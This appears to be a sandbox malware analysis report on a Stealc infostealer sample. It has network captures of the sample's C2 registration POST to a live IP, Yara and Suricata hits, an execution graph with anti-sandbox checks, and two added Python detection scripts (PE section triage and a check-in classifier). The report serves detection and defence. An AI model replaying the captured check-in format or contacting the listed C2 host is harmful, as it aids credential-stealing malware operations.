A single import, kernel32!lstrcpy, is all the loader resolves; the execution graph below shows the unpacked code resolving everything else itself through LoadLibraryA and GetProcAddress, which is why the static import hash says almost nothing about the payload.
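The three static findings above (empty section names, RWX mappings, an entry point outside a code section, plus the virtual-versus-raw size gap that signals room to unpack into) can be reproduced from the section headers alone. The following is an added example, not Joe Sandbox code and not taken from the sample: a standard-library-only section-header parser plus the triage checks, run by default against a header-only PE32 stub constructed here from this report's section values (not the real file.exe). The 64 KiB slack threshold and the list of "standard" section names are my own assumptions.

```python
"""Section-header triage for a PE file: unnamed sections, RWX mappings,
entry point outside a code section, virtual size far above raw size.
Added example, not Joe Sandbox code; thresholds and name list are assumptions."""
import struct
import sys

STANDARD_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                  ".reloc", ".bss", ".tls", ".pdata", ".CRT", "CODE", "DATA"}
SCN_MEM_EXECUTE, SCN_MEM_WRITE = 0x20000000, 0x80000000
RWX, RW = 0xE0000040, 0xC0000040   # CNT_INITIALIZED_DATA | (EXECUTE |) READ | WRITE
UNPACK_SLACK = 0x10000             # assumption: >64 KiB of vsize beyond raw size


def parse_sections(pe: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) from PE32/PE32+ headers."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file (missing MZ)")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]   # AddressOfEntryPoint
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i                        # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, raw, _p, _r, _l, _nr, _nl, chars = \
            struct.unpack_from("<8sIIIIIIHHI", pe, off)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "raw": raw, "chars": chars})
    return entry_rva, sections


def triage(pe: bytes):
    """Return (name of the section holding the entry point, list of findings)."""
    entry_rva, sections = parse_sections(pe)
    findings, entry_section = [], None
    for s in sections:
        label = s["name"] or "<unnamed>"
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw"]):
            entry_section = s["name"]
        if not s["name"] or any(not 0x21 <= ord(c) <= 0x7E for c in s["name"]):
            findings.append(f"section at RVA {s['va']:#x} has an empty or non-printable name")
        elif s["name"] not in STANDARD_NAMES:
            findings.append(f"non-standard section name {label!r}")
        if s["chars"] & SCN_MEM_EXECUTE and s["chars"] & SCN_MEM_WRITE:
            findings.append(f"section {label!r} is mapped writable and executable (RWX)")
        if s["vsize"] - s["raw"] > UNPACK_SLACK:
            findings.append(f"section {label!r}: virtual size {s['vsize']:#x} far above "
                            f"raw size {s['raw']:#x} (room to unpack into)")
    if entry_section is None:
        findings.append(f"entry point {entry_rva:#x} is outside every section")
    elif entry_section not in (".text", "CODE"):
        findings.append(f"entry point {entry_rva:#x} lies outside a standard code section "
                        f"(in {entry_section!r})")
    return entry_section, findings


def build_stub_pe(entry_rva: int, sections) -> bytes:
    """Construct a header-only PE32 (DOS header, COFF, optional header, section table)."""
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    opt = bytearray(0xE0)                                     # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)                     # Magic = PE32
    struct.pack_into("<I", opt, 16, entry_rva)                # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                 # ImageBase
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x66F99A4A, 0, 0, len(opt), 0x0102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode()[:8].ljust(8, b"\0"),
                    vsize, va, raw, 0, 0, 0, 0, 0, chars)
        for name, va, vsize, raw, chars in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


# Constructed from the report's section table (name, VA, virtual size, raw size, flags).
SAMPLE_SECTIONS = [
    ("",         0x001000, 0x25B000, 0x22800,  RWX),
    (".rsrc",    0x25C000, 0x001000, 0x0,      RW),
    (".idata",   0x25D000, 0x001000, 0x200,    RW),
    ("",         0x25E000, 0x29D000, 0x200,    RWX),
    ("zmsppxmk", 0x4FB000, 0x19D000, 0x19C200, RWX),
    ("bobhsqhc", 0x698000, 0x001000, 0x400,    RWX),
    (".taggant", 0x699000, 0x003000, 0x2200,   RWX),
]
SAMPLE_PE = build_stub_pe(0x699000, SAMPLE_SECTIONS)   # entry point = start of .taggant

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PE
    section, found = triage(data)
    print(f"entry point section: {section!r}")
    for line in found:
        print(" -", line)
```

Run it with a path argument to triage a real file; without one it walks the constructed stub and reports thirteen findings, including the entry point in .taggant and the two unnamed sections with unpack slack. The slack check is the one worth tuning: a linker-produced .bss legitimately has virtual size without raw data, so on real corpora combine it with the RWX and name checks rather than alerting on it alone.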
Suricata IDS alert:
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-08T10:28:21.774078+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
TCP packets (one connection, 192.168.2.4:49730 to 185.215.113.37:80):
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 10:28:20.810684919 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 10:28:20.815936089 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 10:28:20.816036940 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 10:28:20.816272974 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 10:28:20.821115971 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 10:28:21.530180931 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 10:28:21.530308008 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 10:28:21.532651901 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 10:28:21.537703037 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 10:28:21.773912907 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 10:28:21.774077892 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 10:28:25.583175898 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
HTTP sessions with 185.215.113.37:
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 7112 | C:\Users\user\Desktop\file.exe
Session 0, request/response pairs (Timestamp, bytes transferred, direction; the POST body's raw hex is kept verbatim and its ASCII rendering has its CRLF line structure restored):

Oct 8, 2024 10:28:20.816272974 CEST, 89 bytes, OUT:
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache

Oct 8, 2024 10:28:21.530180931 CEST, 203 bytes, IN:
HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 08:28:21 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 8, 2024 10:28:21.532651901 CEST, 412 bytes, OUT:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCF
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 46 39 41 37 46 38 46 31 32 44 34 31 30 36 38 35 34 30 37 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 2d 2d 0d 0a
Data Ascii:
------JKJDAEBFCBKECBGDBFCF
Content-Disposition: form-data; name="hwid"

6F9A7F8F12D41068540764
------JKJDAEBFCBKECBGDBFCF
Content-Disposition: form-data; name="build"

doma
------JKJDAEBFCBKECBGDBFCF--

Oct 8, 2024 10:28:21.773912907 CEST, 210 bytes, IN:
HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 08:28:21 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=

This is the Stealc bot registration: the sample first probes the C2 root with a GET (answered with an empty 200), then POSTs a multipart form carrying a hardware id (hwid=6F9A7F8F12D41068540764) and a build tag (build=doma) to /e2b1563c6670f193.php. The reply YmxvY2s= is base64 for the string "block": the C2 declined this client, no configuration or module download followed, and the connection shows no further requests before the sample exited. The Suricata alert (SID 2044243) fired on this POST/response pair at 10:28:21.774, the moment of the C2's reply, so this run captured only the check-in and none of the credential-theft traffic a served Stealc session would produce.
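To turn the exchange above into something that can be checked offline against other captures, here is an added example (not Joe Sandbox code, not Stealc code, and not the logic of the SID 2044243 rule): it rebuilds the POST and its reply from the session in the report, parses the multipart form, base64-decodes the reply and scores the pair against the pattern the capture shows. The path and boundary regexes and the "3 of 4 indicators" threshold are my assumptions, not a published signature; the request bytes are reconstructed from the report's Data Raw hex.

```python
"""Parse and score a Stealc-style check-in (POST to /<16 hex>.php with a
multipart hwid/build form, short base64 reply). Added example; the request
bytes are reconstructed from the report, the matching rules are assumptions."""
import base64
import re

# Constructed from the report's HTTP session (body is the decoded Data Raw hex).
CHECKIN_REQUEST = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCF\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------JKJDAEBFCBKECBGDBFCF\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"6F9A7F8F12D41068540764\r\n"
    b"------JKJDAEBFCBKECBGDBFCF\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"doma\r\n"
    b"------JKJDAEBFCBKECBGDBFCF--\r\n"
)
CHECKIN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.4.52 (Ubuntu)\r\n"
    b"Content-Length: 8\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"\r\n"
    b"YmxvY2s="
)

STEALC_PATH = re.compile(r"^/[0-9a-f]{16}\.php$")   # assumption: 16 hex chars + .php
UPPER_BOUNDARY = re.compile(r"^-{4}[A-Z]+$")         # assumption: ----<UPPERCASE LETTERS>


def parse_http(message: bytes):
    """Split a raw HTTP message into (start line, {lower-case header: value}, body)."""
    head, _, body = message.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().lower().decode()] = value.strip().decode(errors="replace")
    return lines[0].decode(errors="replace"), headers, body


def parse_multipart(body: bytes, boundary: str):
    """Return {field name: value} for a multipart/form-data body."""
    fields = {}
    delim = b"--" + boundary.encode()
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        part_head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"', part_head)
        if m:
            fields[m.group(1).decode()] = value.rstrip(b"\r\n").decode(errors="replace")
    return fields


def classify_checkin(request: bytes, response: bytes):
    """Score a request/response pair; returns (is_match, details)."""
    start, headers, body = parse_http(request)
    parts = start.split(" ")
    method, path = (parts + ["", ""])[:2]
    m = re.search(r"boundary=([^;]+)", headers.get("content-type", ""))
    boundary = m.group(1).strip() if m else ""
    fields = parse_multipart(body, boundary) if boundary else {}
    _, _, resp_body = parse_http(response)
    reply = None
    if resp_body:
        try:                                # validate=True rejects non-base64 bodies
            reply = base64.b64decode(resp_body, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            reply = None
    indicators = {
        "post_to_16hex_php": method == "POST" and bool(STEALC_PATH.match(path)),
        "multipart_hwid_build": set(fields) == {"hwid", "build"},
        "uppercase_boundary": bool(UPPER_BOUNDARY.match(boundary)),
        "short_base64_ascii_reply": reply is not None and len(reply) <= 32,
    }
    details = {"path": path, "fields": fields, "reply": reply, "indicators": indicators}
    return sum(indicators.values()) >= 3, details


if __name__ == "__main__":
    hit, info = classify_checkin(CHECKIN_REQUEST, CHECKIN_RESPONSE)
    print("stealc check-in" if hit else "no match", info)
```

On the captured pair every indicator fires and the reply decodes to "block". The GET probe that precedes it scores zero, which is the point of requiring several indicators: a POST to a random-looking .php path on its own is common in benign traffic, while the combination of that path, an uppercase-only boundary and a form consisting of exactly hwid and build is what the capture actually shows.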


                          Target ID:0
                          Start time:04:28:16
                          Start date:08/10/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
Imagebase:0x380000 (runtime load address; the file's preferred base is 0x400000 and DYNAMIC_BASE is set, so ASLR relocated the image, and the Yara hit at 0x381000 below is RVA 0x1000, the start of the first, unnamed section)
                          File size:1'844'224 bytes
                          MD5 hash:F10C33B85DCDAD1AFD46AFC292250F45
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1759771807.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true


                            Execution Graph

                            Execution Coverage:7.5%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:2.9%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:25
                            execution_graph 13393 3969f0 13438 382260 13393->13438 13417 396a64 13418 39a9b0 4 API calls 13417->13418 13419 396a6b 13418->13419 13420 39a9b0 4 API calls 13419->13420 13421 396a72 13420->13421 13422 39a9b0 4 API calls 13421->13422 13423 396a79 13422->13423 13424 39a9b0 4 API calls 13423->13424 13425 396a80 13424->13425 13590 39a8a0 13425->13590 13427 396b0c 13594 396920 GetSystemTime 13427->13594 13428 396a89 13428->13427 13430 396ac2 OpenEventA 13428->13430 13432 396ad9 13430->13432 13433 396af5 CloseHandle Sleep 13430->13433 13437 396ae1 CreateEventA 13432->13437 13436 396b0a 13433->13436 13436->13428 13437->13427 13791 3845c0 13438->13791 13440 382274 13441 3845c0 2 API calls 13440->13441 13442 38228d 13441->13442 13443 3845c0 2 API calls 13442->13443 13444 3822a6 13443->13444 13445 3845c0 2 API calls 13444->13445 13446 3822bf 13445->13446 13447 3845c0 2 API calls 13446->13447 13448 3822d8 13447->13448 13449 3845c0 2 API calls 13448->13449 13450 3822f1 13449->13450 13451 3845c0 2 API calls 13450->13451 13452 38230a 13451->13452 13453 3845c0 2 API calls 13452->13453 13454 382323 13453->13454 13455 3845c0 2 API calls 13454->13455 13456 38233c 13455->13456 13457 3845c0 2 API calls 13456->13457 13458 382355 13457->13458 13459 3845c0 2 API calls 13458->13459 13460 38236e 13459->13460 13461 3845c0 2 API calls 13460->13461 13462 382387 13461->13462 13463 3845c0 2 API calls 13462->13463 13464 3823a0 13463->13464 13465 3845c0 2 API calls 13464->13465 13466 3823b9 13465->13466 13467 3845c0 2 API calls 13466->13467 13468 3823d2 13467->13468 13469 3845c0 2 API calls 13468->13469 13470 3823eb 13469->13470 13471 3845c0 2 API calls 13470->13471 13472 382404 13471->13472 13473 3845c0 2 API calls 13472->13473 13474 38241d 13473->13474 13475 3845c0 2 API calls 13474->13475 13476 382436 13475->13476 13477 3845c0 2 API calls 13476->13477 13478 38244f 13477->13478 13479 3845c0 2 API calls 13478->13479 13480 382468 13479->13480 13481 3845c0 2 API calls 
13480->13481 13482 382481 13481->13482 13483 3845c0 2 API calls 13482->13483 13484 38249a 13483->13484 13485 3845c0 2 API calls 13484->13485 13486 3824b3 13485->13486 13487 3845c0 2 API calls 13486->13487 13488 3824cc 13487->13488 13489 3845c0 2 API calls 13488->13489 13490 3824e5 13489->13490 13491 3845c0 2 API calls 13490->13491 13492 3824fe 13491->13492 13493 3845c0 2 API calls 13492->13493 13494 382517 13493->13494 13495 3845c0 2 API calls 13494->13495 13496 382530 13495->13496 13497 3845c0 2 API calls 13496->13497 13498 382549 13497->13498 13499 3845c0 2 API calls 13498->13499 13500 382562 13499->13500 13501 3845c0 2 API calls 13500->13501 13502 38257b 13501->13502 13503 3845c0 2 API calls 13502->13503 13504 382594 13503->13504 13505 3845c0 2 API calls 13504->13505 13506 3825ad 13505->13506 13507 3845c0 2 API calls 13506->13507 13508 3825c6 13507->13508 13509 3845c0 2 API calls 13508->13509 13510 3825df 13509->13510 13511 3845c0 2 API calls 13510->13511 13512 3825f8 13511->13512 13513 3845c0 2 API calls 13512->13513 13514 382611 13513->13514 13515 3845c0 2 API calls 13514->13515 13516 38262a 13515->13516 13517 3845c0 2 API calls 13516->13517 13518 382643 13517->13518 13519 3845c0 2 API calls 13518->13519 13520 38265c 13519->13520 13521 3845c0 2 API calls 13520->13521 13522 382675 13521->13522 13523 3845c0 2 API calls 13522->13523 13524 38268e 13523->13524 13525 399860 13524->13525 13796 399750 GetPEB 13525->13796 13527 399868 13528 399a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13527->13528 13531 39987a 13527->13531 13529 399b0d 13528->13529 13530 399af4 GetProcAddress 13528->13530 13532 399b46 13529->13532 13533 399b16 GetProcAddress GetProcAddress 13529->13533 13530->13529 13534 39988c 21 API calls 13531->13534 13535 399b68 13532->13535 13536 399b4f GetProcAddress 13532->13536 13533->13532 13534->13528 13537 399b89 13535->13537 13538 399b71 GetProcAddress 13535->13538 13536->13535 13539 396a00 13537->13539 13540 399b92 GetProcAddress 
GetProcAddress 13537->13540 13538->13537 13541 39a740 13539->13541 13540->13539 13542 39a750 13541->13542 13543 396a0d 13542->13543 13544 39a77e lstrcpy 13542->13544 13545 3811d0 13543->13545 13544->13543 13546 3811e8 13545->13546 13547 38120f ExitProcess 13546->13547 13548 381217 13546->13548 13549 381160 GetSystemInfo 13548->13549 13550 38117c ExitProcess 13549->13550 13551 381184 13549->13551 13552 381110 GetCurrentProcess VirtualAllocExNuma 13551->13552 13553 381149 13552->13553 13554 381141 ExitProcess 13552->13554 13797 3810a0 VirtualAlloc 13553->13797 13557 381220 13801 3989b0 13557->13801 13560 381249 __aulldiv 13561 38129a 13560->13561 13562 381292 ExitProcess 13560->13562 13563 396770 GetUserDefaultLangID 13561->13563 13564 3967d3 13563->13564 13565 396792 13563->13565 13571 381190 13564->13571 13565->13564 13566 3967cb ExitProcess 13565->13566 13567 3967ad ExitProcess 13565->13567 13568 3967c1 ExitProcess 13565->13568 13569 3967a3 ExitProcess 13565->13569 13570 3967b7 ExitProcess 13565->13570 13572 3978e0 3 API calls 13571->13572 13573 38119e 13572->13573 13574 3811cc 13573->13574 13575 397850 3 API calls 13573->13575 13578 397850 GetProcessHeap RtlAllocateHeap GetUserNameA 13574->13578 13576 3811b7 13575->13576 13576->13574 13577 3811c4 ExitProcess 13576->13577 13579 396a30 13578->13579 13580 3978e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13579->13580 13581 396a43 13580->13581 13582 39a9b0 13581->13582 13803 39a710 13582->13803 13584 39a9c1 lstrlen 13586 39a9e0 13584->13586 13585 39aa18 13804 39a7a0 13585->13804 13586->13585 13588 39a9fa lstrcpy lstrcat 13586->13588 13588->13585 13589 39aa24 13589->13417 13591 39a8bb 13590->13591 13592 39a90b 13591->13592 13593 39a8f9 lstrcpy 13591->13593 13592->13428 13593->13592 13808 396820 13594->13808 13596 39698e 13597 396998 sscanf 13596->13597 13837 39a800 13597->13837 13599 3969aa SystemTimeToFileTime SystemTimeToFileTime 13600 3969ce 13599->13600 13601 3969e0 13599->13601 13600->13601 13602 3969d8 
ExitProcess 13600->13602 13603 395b10 13601->13603 13604 395b1d 13603->13604 13605 39a740 lstrcpy 13604->13605 13606 395b2e 13605->13606 13839 39a820 lstrlen 13606->13839 13609 39a820 2 API calls 13610 395b64 13609->13610 13611 39a820 2 API calls 13610->13611 13612 395b74 13611->13612 13843 396430 13612->13843 13615 39a820 2 API calls 13616 395b93 13615->13616 13617 39a820 2 API calls 13616->13617 13618 395ba0 13617->13618 13619 39a820 2 API calls 13618->13619 13620 395bad 13619->13620 13621 39a820 2 API calls 13620->13621 13622 395bf9 13621->13622 13852 3826a0 13622->13852 13630 395cc3 13631 396430 lstrcpy 13630->13631 13632 395cd5 13631->13632 13633 39a7a0 lstrcpy 13632->13633 13634 395cf2 13633->13634 13635 39a9b0 4 API calls 13634->13635 13636 395d0a 13635->13636 13637 39a8a0 lstrcpy 13636->13637 13638 395d16 13637->13638 13639 39a9b0 4 API calls 13638->13639 13640 395d3a 13639->13640 13641 39a8a0 lstrcpy 13640->13641 13642 395d46 13641->13642 13643 39a9b0 4 API calls 13642->13643 13644 395d6a 13643->13644 13645 39a8a0 lstrcpy 13644->13645 13646 395d76 13645->13646 13647 39a740 lstrcpy 13646->13647 13648 395d9e 13647->13648 14578 397500 GetWindowsDirectoryA 13648->14578 13651 39a7a0 lstrcpy 13652 395db8 13651->13652 14588 384880 13652->14588 13654 395dbe 14734 3917a0 13654->14734 13656 395dc6 13657 39a740 lstrcpy 13656->13657 13658 395de9 13657->13658 13659 381590 lstrcpy 13658->13659 13660 395dfd 13659->13660 14750 385960 13660->14750 13662 395e03 14894 391050 13662->14894 13664 395e0e 13665 39a740 lstrcpy 13664->13665 13666 395e32 13665->13666 13667 381590 lstrcpy 13666->13667 13668 395e46 13667->13668 13669 385960 34 API calls 13668->13669 13670 395e4c 13669->13670 14898 390d90 13670->14898 13672 395e57 13673 39a740 lstrcpy 13672->13673 13674 395e79 13673->13674 13675 381590 lstrcpy 13674->13675 13676 395e8d 13675->13676 13677 385960 34 API calls 13676->13677 13678 395e93 13677->13678 14905 390f40 13678->14905 13680 395e9e 13681 381590 lstrcpy 13680->13681 
15016->15017 15018 391dcf 15017->15018 15019 39a9b0 4 API calls 15018->15019 15020 391df0 15019->15020 15021 39a8a0 lstrcpy 15020->15021 15022 391df9 15021->15022 15683 397980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15022->15683 15025 39a9b0 4 API calls 15026 391e19 15025->15026 15027 39a8a0 lstrcpy 15026->15027 15028 391e22 15027->15028 15029 39a9b0 4 API calls 15028->15029 15030 391e41 15029->15030 15031 39a8a0 lstrcpy 15030->15031 15032 391e4a 15031->15032 15033 39a9b0 4 API calls 15032->15033 15034 391e6b 15033->15034 15035 39a8a0 lstrcpy 15034->15035 15036 391e74 15035->15036 15685 397a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15036->15685 15039 39a9b0 4 API calls 15040 391e94 15039->15040 15041 39a8a0 lstrcpy 15040->15041 15042 391e9d 15041->15042 15043 39a9b0 4 API calls 15042->15043 15044 391ebc 15043->15044 15045 39a8a0 lstrcpy 15044->15045 15046 391ec5 15045->15046 15047 39a9b0 4 API calls 15046->15047 15048 391ee5 15047->15048 15049 39a8a0 lstrcpy 15048->15049 15050 391eee 15049->15050 15688 397b00 GetUserDefaultLocaleName 15050->15688 15053 39a9b0 4 API calls 15054 391f0e 15053->15054 15055 39a8a0 lstrcpy 15054->15055 15056 391f17 15055->15056 15057 39a9b0 4 API calls 15056->15057 15058 391f36 15057->15058 15059 39a8a0 lstrcpy 15058->15059 15060 391f3f 15059->15060 15061 39a9b0 4 API calls 15060->15061 15062 391f60 15061->15062 15063 39a8a0 lstrcpy 15062->15063 15064 391f69 15063->15064 15692 397b90 15064->15692 15066 391f80 15067 39a920 3 API calls 15066->15067 15068 391f93 15067->15068 15069 39a8a0 lstrcpy 15068->15069 15070 391f9c 15069->15070 15071 39a9b0 4 API calls 15070->15071 15072 391fc6 15071->15072 15073 39a8a0 lstrcpy 15072->15073 15074 391fcf 15073->15074 15075 39a9b0 4 API calls 15074->15075 15076 391fef 15075->15076 15077 39a8a0 lstrcpy 15076->15077 15078 391ff8 15077->15078 15704 397d80 GetSystemPowerStatus 15078->15704 15081 39a9b0 4 API calls 15082 392018 15081->15082 15083 39a8a0 lstrcpy 15082->15083 15084 
392021 15083->15084 15085 39a9b0 4 API calls 15084->15085 15086 392040 15085->15086 15087 39a8a0 lstrcpy 15086->15087 15088 392049 15087->15088 15089 39a9b0 4 API calls 15088->15089 15090 39206a 15089->15090 15091 39a8a0 lstrcpy 15090->15091 15092 392073 15091->15092 15093 39207e GetCurrentProcessId 15092->15093 15706 399470 OpenProcess 15093->15706 15096 39a920 3 API calls 15097 3920a4 15096->15097 15098 39a8a0 lstrcpy 15097->15098 15099 3920ad 15098->15099 15100 39a9b0 4 API calls 15099->15100 15101 3920d7 15100->15101 15102 39a8a0 lstrcpy 15101->15102 15103 3920e0 15102->15103 15104 39a9b0 4 API calls 15103->15104 15105 392100 15104->15105 15106 39a8a0 lstrcpy 15105->15106 15107 392109 15106->15107 15711 397e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15107->15711 15110 39a9b0 4 API calls 15111 392129 15110->15111 15112 39a8a0 lstrcpy 15111->15112 15113 392132 15112->15113 15114 39a9b0 4 API calls 15113->15114 15115 392151 15114->15115 15116 39a8a0 lstrcpy 15115->15116 15117 39215a 15116->15117 15118 39a9b0 4 API calls 15117->15118 15119 39217b 15118->15119 15120 39a8a0 lstrcpy 15119->15120 15121 392184 15120->15121 15715 397f60 15121->15715 15124 39a9b0 4 API calls 15125 3921a4 15124->15125 15126 39a8a0 lstrcpy 15125->15126 15127 3921ad 15126->15127 15128 39a9b0 4 API calls 15127->15128 15129 3921cc 15128->15129 15130 39a8a0 lstrcpy 15129->15130 15131 3921d5 15130->15131 15132 39a9b0 4 API calls 15131->15132 15133 3921f6 15132->15133 15134 39a8a0 lstrcpy 15133->15134 15135 3921ff 15134->15135 15728 397ed0 GetSystemInfo wsprintfA 15135->15728 15138 39a9b0 4 API calls 15139 39221f 15138->15139 15140 39a8a0 lstrcpy 15139->15140 15141 392228 15140->15141 15142 39a9b0 4 API calls 15141->15142 15143 392247 15142->15143 15144 39a8a0 lstrcpy 15143->15144 15145 392250 15144->15145 15146 39a9b0 4 API calls 15145->15146 15147 392270 15146->15147 15148 39a8a0 lstrcpy 15147->15148 15149 392279 15148->15149 15730 398100 GetProcessHeap RtlAllocateHeap 15149->15730 15152 
39a9b0 4 API calls 15153 392299 15152->15153 15154 39a8a0 lstrcpy 15153->15154 15155 3922a2 15154->15155 15156 39a9b0 4 API calls 15155->15156 15157 3922c1 15156->15157 15158 39a8a0 lstrcpy 15157->15158 15159 3922ca 15158->15159 15160 39a9b0 4 API calls 15159->15160 15161 3922eb 15160->15161 15162 39a8a0 lstrcpy 15161->15162 15163 3922f4 15162->15163 15736 3987c0 15163->15736 15166 39a920 3 API calls 15167 39231e 15166->15167 15168 39a8a0 lstrcpy 15167->15168 15169 392327 15168->15169 15170 39a9b0 4 API calls 15169->15170 15171 392351 15170->15171 15172 39a8a0 lstrcpy 15171->15172 15173 39235a 15172->15173 15174 39a9b0 4 API calls 15173->15174 15175 39237a 15174->15175 15176 39a8a0 lstrcpy 15175->15176 15177 392383 15176->15177 15178 39a9b0 4 API calls 15177->15178 15179 3923a2 15178->15179 15180 39a8a0 lstrcpy 15179->15180 15181 3923ab 15180->15181 15741 3981f0 15181->15741 15183 3923c2 15184 39a920 3 API calls 15183->15184 15185 3923d5 15184->15185 15186 39a8a0 lstrcpy 15185->15186 15187 3923de 15186->15187 15188 39a9b0 4 API calls 15187->15188 15189 39240a 15188->15189 15190 39a8a0 lstrcpy 15189->15190 15191 392413 15190->15191 15192 39a9b0 4 API calls 15191->15192 15193 392432 15192->15193 15194 39a8a0 lstrcpy 15193->15194 15195 39243b 15194->15195 15196 39a9b0 4 API calls 15195->15196 15197 39245c 15196->15197 15198 39a8a0 lstrcpy 15197->15198 15199 392465 15198->15199 15200 39a9b0 4 API calls 15199->15200 15201 392484 15200->15201 15202 39a8a0 lstrcpy 15201->15202 15203 39248d 15202->15203 